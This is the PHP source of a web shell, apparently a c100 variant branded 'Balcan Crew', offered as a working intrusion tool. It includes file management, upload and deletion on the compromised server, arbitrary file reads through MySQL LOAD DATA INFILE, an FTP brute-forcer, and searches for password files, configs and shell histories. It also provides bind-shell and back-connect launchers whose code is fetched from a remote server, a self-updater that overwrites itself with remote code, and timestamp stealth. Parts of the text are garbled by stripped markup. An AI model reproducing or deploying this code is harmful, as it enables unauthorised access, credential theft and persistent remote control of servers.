abudaaa $v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "Undetectable #18a"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("N3tsh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("N3tsh_surl",$surl);}
else {$surl = $_REQUEST["N3tsh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["N3tsh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = " c100 v. ".$shver.": access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "OwneR By Qurd_Az " (default)
string {closetag} - close html-tag, e.g. " " (default)
bool {break} - if TRUE and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,""," "), // example
array("config.php",1) // example
);
$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "Don"; // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}
$sess_cookie = "balcanCrew"; // Cookie-variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting
//Quick launch
$quicklaunch = array(
array("Encoder ",$surl."act=encoder&d=%d"),
array("Tools ",$surl."act=tools&d=%d"),
array("Proc. ",$surl."act=processes&d=%d"),
array("FTP brute ",$surl."act=ftpquickbrute&d=%d"),
array("Sec. ",$surl."act=security&d=%d"),
array("SQL ",$surl."act=sql&d=%d"),
array("PHP-code ",$surl."act=eval&d=%d"),
array("Update ",$surl."act=update&d=%d"),
array("Feedback ",$surl."act=feedback&d=%d"),
array("Self remove ",$surl."act=selfremove"),
array("Logout ","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
);
//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
@$f = $_REQUEST["f"];
@extract($_REQUEST["N3tshcook"]);
//END CONFIGURATION
// \/Next code isn't for editing\/
@set_time_limit(0);
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c100 : Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
if (!empty($login))
{
if (empty($md5_pass)) {$md5_pass = md5($pass);}
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
{
if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |".view_perms(fileperms($o))." ";}
elseif (!is_writable($o)) {return "".view_perms(fileperms($o))." ";}
else {return "".view_perms(fileperms($o))." ";}
}
}
if (!function_exists("N3tgetsource"))
{
function N3tgetsource($fn)
{
global $N3tsh_sourcesurl;
$array = array(
"N3tsh_bindport.pl" => "N3tsh_bindport_pl.txt",
"N3tsh_bindport.c" => "N3tsh_bindport_c.txt",
"N3tsh_backconn.pl" => "N3tsh_backconn_pl.txt",
"N3tsh_backconn.c" => "N3tsh_backconn_c.txt",
"N3tsh_datapipe.pl" => "N3tsh_datapipe_pl.txt",
"N3tsh_datapipe.c" => "N3tsh_datapipe_c.txt",
);
$name = $array[$fn];
if ($name) {return file_get_contents($N3tsh_sourcesurl.$name);}
else {return FALSE;}
}
}
if (!function_exists("N3tsh_getupdate"))
{
function N3tsh_getupdate($update = TRUE)
{
$url = $GLOBALS["N3tsh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
$data = @file_get_contents($url);
if (!$data) {return "Can't connect to update-server!";}
else
{
$data = ltrim($data);
$string = substr($data,3,ord($data{2}));
if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
if ($data{0} == "\x99" and $data{1} == "\x03")
{
$string = explode("\x01",$string);
if ($update)
{
$confvars = array();
$sourceurl = $string[0];
$source = file_get_contents($sourceurl);
if (!$source) {return "Can't fetch update!";}
else
{
$fp = fopen(__FILE__,"w");
if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c100.php manually here Error: Fields: ".$name."
";
}
}
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists("mysql_create_db"))
{
function mysql_create_db($db,$sock="")
{
$sql = "CREATE DATABASE `".addslashes($db)."`;";
if ($sock) {return mysql_query($sql,$sock);}
else {return mysql_query($sql);}
}
}
if (!function_exists("mysql_query_parse"))
{
function mysql_query_parse($query)
{
$query = trim($query);
$arr = explode (" ",$query);
/*array array()
{
"METHOD"=>array(output_type),
"METHOD1"...
...
}
if output_type == 0, no output,
if output_type == 1, no output if no error
if output_type == 2, output without control-buttons
if output_type == 3, output with control-buttons
*/
$types = array(
"SELECT"=>array(3,1),
"SHOW"=>array(2,1),
"DELETE"=>array(1),
"DROP"=>array(1)
);
$result = array();
$op = strtoupper($arr[0]);
if (is_array($types[$op]))
{
$result["propertions"] = $types[$op];
$result["query"] = $query;
if ($types[$op] == 2)
{
foreach($arr as $k=>$v)
{
if (strtoupper($v) == "LIMIT")
{
$result["limit"] = $arr[$k+1];
$result["limit"] = explode(",",$result["limit"]);
if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
unset($arr[$k],$arr[$k+1]);
}
}
}
}
else {return FALSE;}
}
}
if (!function_exists("N3tfsearch"))
{
function N3tfsearch($d)
{
global $found;
global $found_d;
global $found_f;
global $search_i_f;
global $search_i_d;
global $a;
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$h = opendir($d);
while (($f = readdir($h)) !== FALSE)
{
if($f != "." && $f != "..")
{
$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
if (is_dir($d.$f))
{
$search_i_d++;
if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
if (!is_link($d.$f)) {N3tfsearch($d.$f);}
}
else
{
$search_i_f++;
if ($bool)
{
if (!empty($a["text"]))
{
$r = @file_get_contents($d.$f);
if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
else {$bool = strpos(" ".$r,$a["text"],1);}
if ($a["text_not"]) {$bool = !$bool;}
if ($bool) {$found[] = $d.$f; $found_f++;}
}
else {$found[] = $d.$f; $found_f++;}
}
}
}
}
closedir($h);
}
}
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
//Sending headers
@ob_start();
@ob_implicit_flush(0);
function onphpshutdown()
{
global $gzipencode,$ft;
if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
{
$v = @ob_get_contents();
@ob_end_clean();
@ob_start("ob_gzHandler");
echo $v;
@ob_end_flush();
}
}
function N3tshexit()
{
onphpshutdown();
exit;
}
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache");
if (empty($tmpdir))
{
$tmpdir = ini_get("upload_tmp_dir");
if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = TRUE;
$hsafemode = "ON (secure) ";
}
else {$safemode = FALSE; $hsafemode = "OFF (no secure) ";}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v." ";}
else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure) ";}
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."
<?php echo getenv("HTTP_HOST"); ?> - ::: Balcan Crew :::
!
C100 !
..:: 0wn3R By Qurd_Az ::..
Software:
uname -a: ",1); ?>
",1);} else {echo get_current_user();} ?>
Safe-mode:
".htmlspecialchars($b).DIRECTORY_SEPARATOR." ";
$i++;
}
echo " ";
if (is_writable($d))
{
$wd = TRUE;
$wdt = "[ ok ] ";
echo "".view_perms(fileperms($d))." [ Read-Only ] ";
echo "".view_perms_color($d)." ";
}
if (is_callable("disk_free_space"))
{
$free = disk_free_space($d);
$total = disk_total_space($d);
if ($free === FALSE) {$free = 0;}
if ($total === FALSE) {$total = 0;}
if ($free < 0) {$free = 0;}
if ($total < 0) {$total = 0;}
$used = $total-$free;
$free_percent = round(100/($total/$free),2);
echo "Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%) ";
}
echo "[ ";
if ($letter.":" != $v) {$letters .= $letter;}
else {$letters .= "".$letter." ";}
$letters .= " ] ";
}
}
if (!empty($letters)) {echo "Detected drives : ".$letters."".$item[0]." ";
}
}
echo "
";
if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
$sql_surl = $surl."act=sql";
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
$sql_surl .= "&";
?>Attention! SQL-Manager is NOT ready module! Don't reports bugs. SQL Manager:Can't connect ".$err." ";}
}
else
{
$sqlquicklaunch = array();
$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
$sqlquicklaunch[] = array("Logout",$surl."act=sql");
echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\") ".$item[0]." ";
if (!$sql_sock) {?>
i If login is null, login is owner of process.
If host is null, host is localhost If port is null, port is
3306 (default)
Please, fill the form: Username
Password Database
">
Home ".htmlspecialchars($sql_db)." ]---\BB ".htmlspecialchars($row[0])." "; mysql_free_result($count); $c++;}
if (!$c) {echo "No tables found in database.";}
}
}
else
{
?>
Home ";
//Start center panel
$diplay = TRUE;
if ($sql_db)
{
if (!is_numeric($c)) {$c = 0;}
if ($c == 0) {$c = "no";}
echo "There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").".$item[0]." ] ";}}
echo " Error:
Create new table:
Dump DB:
";}
if ($sql_act == "newtbl")
{
echo "";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success! Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
else
{
fwrite($fp,$ret);
fclose($fp);
echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).") .";
}
}
else {echo "Dump: nothing to do! ";}
}
}
if ($diplay)
{
if (!empty($sql_tbl))
{
if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
$count_row = mysql_fetch_array($count);
mysql_free_result($count);
$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
$tbl_struct_fields = array();
while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
$perpage = $sql_tbl_le - $sql_tbl_ls;
if (!is_numeric($perpage)) {$perpage = 10;}
$numpages = $count_row[0]/$perpage;
$e = explode(" ",$sql_order);
if (count($e) == 2)
{
if ($e[0] == "d") {$asc_desc = "DESC";}
else {$asc_desc = "ASC";}
$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
}
else {$v = "";}
$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
$result = mysql_query($query) or print(mysql_smarterror());
echo " Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows) [ Structure ] ";
echo "[ Browse ] ";
echo "[ Dump ] ";
echo "[ Insert ] ";
if ($sql_tbl_act == "structure") {echo "Coming sooon! ";}
if ($sql_tbl_act == "insert")
{
if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
if (!empty($sql_tbl_insert_radio))
{
}
else
{
echo "Inserting row into table: ";}
echo $i;
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "
Create new DB:
View File:
";
if ($sql_act == "newdb")
{
echo "";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success! Server-status variables: Name Value ".$row[0]." ".$row[1]."
Server variables: Name Value ".$row[0]." ".$row[1]."
";
mysql_free_result($result);
}
if ($sql_act == "processes")
{
if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen. ";}
$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
echo "Processes: ID USER HOST DB COMMAND TIME STATE INFO Action ".$row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." Kill
";
mysql_free_result($result);
}
if ($sql_act == "getfile")
{
$tmpdb = $sql_login."_tmpdb";
$select = mysql_select_db($tmpdb);
if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
if ($select)
{
$created = FALSE;
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
$result = mysql_query("SELECT * FROM tmp_file;");
if (!$result) {echo "Error in reading file (permision denied)! ";}
else
{
for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!File \"".$sql_getfile."\":
";
if ($sql_sock)
{
$affected = @mysql_affected_rows($sql_sock);
if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
echo " Affected rows: ".$affected."
";
}
if ($act == "mkdir")
{
if ($mkdir != $d)
{
if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\" : object alredy exists";}
elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\" : access denied";}
echo "Ftp Quick brute: Connected to ".$host." with login \"".$login."\" and password \"".$pass."\" Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\" Done! ".$success." Permision denied! Directory information: ";
if (!$win)
{
echo "Owner/Group ";
$ow = posix_getpwuid(fileowner($d));
$gr = posix_getgrgid(filegroup($d));
$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
}
echo " Perms ".view_perms_color($d)." Create time ".date("d/m/Y H:i:s",filectime($d))." Access time ".date("d/m/Y H:i:s",fileatime($d))." MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."
Server security information: Open base dir: ".$hopenbasedir." *nix /etc/passwd: ".$uid["dir"]." ";
echo join(":",$uid)."Get /etc/passwd You can't crack winnt passwords(".$v.") You can crack winnt passwords. Download View cpanel user-domains logs View cpanel logs Apache configuration (httpd.conf) Apache configuration (httpd.conf) Syslog configuration (syslog.conf) Message Of The Day Hosts ".$name." - ";} echo $name.nl2br($value)."Make File \"".htmlspecialchars($mkfile)."\" : object alredy exists";}
elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\" : access denied";}
else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
}
else {$act = $dspact = "ls";}
}
if ($act == "encoder")
{
echo "Encoder: Buffer is empty! File-System buffer Can't delete ".__FILE__."! Error: incorrect confimation! ";}
$rnd = rand(0,9).rand(0,9).rand(0,9);
echo "";
}
}
if ($act == "update") {$ret = N3tsh_getupdate(!!$confirmupdate); echo "".$ret." "; if (stristr($ret,"new version")) {echo "Thanks for your feedback! Your ticket ID: ".$ticket.". Search in file-system: No files found! ";}
else
{
$ls_arr = $found;
$disp_fullpath = TRUE;
$act = "ls";
}
}
echo "";
if ($act == "ls") {$dspact = $act; echo "Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second). Change file-mode with error: can't get current value.";}
else
{
$form = TRUE;
if ($chmod_submit)
{
$octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
else {$err = "Can't chmod to ".$octet.".";}
}
if ($form)
{
$perms = parse_perms($mode);
echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).") Error: ".$err:"")."";
}
}
}
if ($act == "upload")
{
$uploadmess = "";
$uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
if (empty($uploadpath)) {$uploadpath = $d;}
elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
if (!empty($submit))
{
global $HTTP_POST_FILES;
$uploadfile = $HTTP_POST_FILES["uploadfile"];
if (!empty($uploadfile["tmp_name"]))
{
if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
else {$destin = $userfilename;}
if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!Incorect url! ".$uploadmess." ";
$act = "ls";
}
else
{
echo "File upload: ".$uploadmess." ";
}
}
if ($act == "delete")
{
$delerr = "";
foreach ($actbox as $v)
{
$result = FALSE;
$result = fs_rmobj($v);
if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."Deleting with errors: Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE. Pasting with errors: Archivation errors: Pasting with errors: Result of execution this command :Execution command "; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
echo "";
}
}
if ($act == "ls")
{
if (count($ls_arr) > 0) {$list = $ls_arr;}
else
{
$list = array();
if ($h = @opendir($d))
{
while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
closedir($h);
}
else {}
}
if (count($list) == 0) {echo "Can't open folder (".htmlspecialchars($d).")! Name ";
$row[] = "Size ";
$row[] = "Modify ";
if (!$win)
{$row[] = "Owner/Group ";}
$row[] = "Perms ";
$row[] = "Action ";
$parsesort = parsesort($sort);
$sort = $parsesort[0].$parsesort[1];
$k = $parsesort[0];
if ($parsesort[1] != "a") {$parsesort[1] = "d";}
$y = "";
$y .= " ";
$row[$k] .= $y;
for($i=0;$i".$row[$i]."";}
}
$v = $parsesort[0];
usort($objects["folders"], "tabsort");
usort($objects["links"], "tabsort");
usort($objects["files"], "tabsort");
if ($parsesort[1] == "d")
{
$objects["folders"] = array_reverse($objects["folders"]);
$objects["files"] = array_reverse($objects["files"]);
}
$objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
$tab = array();
$tab["cols"] = array($row);
$tab["head"] = array();
$tab["folders"] = array();
$tab["links"] = array();
$tab["files"] = array();
$i = 0;
foreach ($objects as $a)
{
$v = $a[0];
$o = basename($v);
$dir = dirname($v);
if ($disp_fullpath) {$disppath = $v;}
else {$disppath = $o;}
$disppath = str2mini($disppath,60);
if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath." ";}
elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath." ";}
foreach ($regxp_highlight as $r)
{
if (ereg($r[0],$o))
{
if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; N3tshexit();}
else
{
$r[1] = round($r[1]);
$isdir = is_dir($v);
if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
{
if (empty($r[2])) {$r[2] = ""; $r[3] = " ";}
$disppath = $r[2].$disppath.$r[3];
if ($r[4]) {break;}
}
}
}
}
$uo = urlencode($o);
$ud = urlencode($dir);
$uv = urlencode($v);
$row = array();
if ($o == ".")
{
$row[] = "".$o." ";
$row[] = "LINK";
}
elseif ($o == "..")
{
$row[] = "".$o." ";
$row[] = "LINK";
}
elseif (is_dir($v))
{
if (is_link($v))
{
$disppath .= " => ".readlink($v);
$type = "LINK";
$row[] = "[".$disppath."] ";
}
else
{
$type = "DIR";
$row[] = "[".$disppath."] ";
}
$row[] = $type;
}
elseif(is_file($v))
{
$ext = explode(".",$o);
$c = count($ext)-1;
$ext = $ext[$c];
$ext = strtolower($ext);
$row[] = "".$disppath." ";
$row[] = view_size($a[1]);
}
$row[] = date("d.m.Y H:i:s",$a[2]);
if (!$win) {$row[] = $a[3];}
$row[] = "".view_perms_color($v)." Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):
With selected: ";
echo "Delete ";
echo "Change-mode ";
if ($usefsbuff)
{
echo "Cut ";
echo "Copy ";
echo "Unselect ";
}
echo "
";
echo "";
}
}
if ($act == "tools")
{
$bndportsrcs = array(
"N3tsh_bindport.pl"=>array("Using PERL","perl %path %port"),
"N3tsh_bindport.c"=>array("Using C","%path %port %pass")
);
$bcsrcs = array(
"N3tsh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
"N3tsh_backconn.c"=>array("Using C","%path %host %port")
);
$dpsrcs = array(
"N3tsh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
"N3tsh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
);
if (!is_array($bind)) {$bind = array();}
if (!is_array($bc)) {$bc = array();}
if (!is_array($datapipe)) {$datapipe = array();}
if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
if (!empty($bindsubmit))
{
echo "Result of binding port: ".getenv("SERVER_ADDR").":".$bind["port"]." ! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]." \"!View binder's process Result of back connection: Result of datapipe-running: ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]." ! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]." \"!View datapipe process Binding port: Back connection: nc -l -n -v -p "!Datapipe: Note:
sources will be downloaded from remote server.Processes:".$head[$i]." ";}
}
$prcs = array();
foreach ($stack as $line)
{
if (!empty($line))
{
echo "";
$line = explode(" ",$line);
$line[10] = join(" ",array_slice($line,10));
$line = array_slice($line,0,11);
if ($line[0] == get_current_user()) {$line[0] = "".$line[0]." ";}
$line[] = "KILL ";
}
}
}
else
{
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
$ret = convert_cyr_string($ret,"d","w");
$stack = explode("\n",$ret);
unset($stack[0],$stack[2]);
$stack = array_values($stack);
$head = explode("",$stack[0]);
$head[1] = explode(" ",$head[1]);
$head[1] = $head[1][0];
$stack = array_slice($stack,1);
unset($head[2]);
$head = array_values($head);
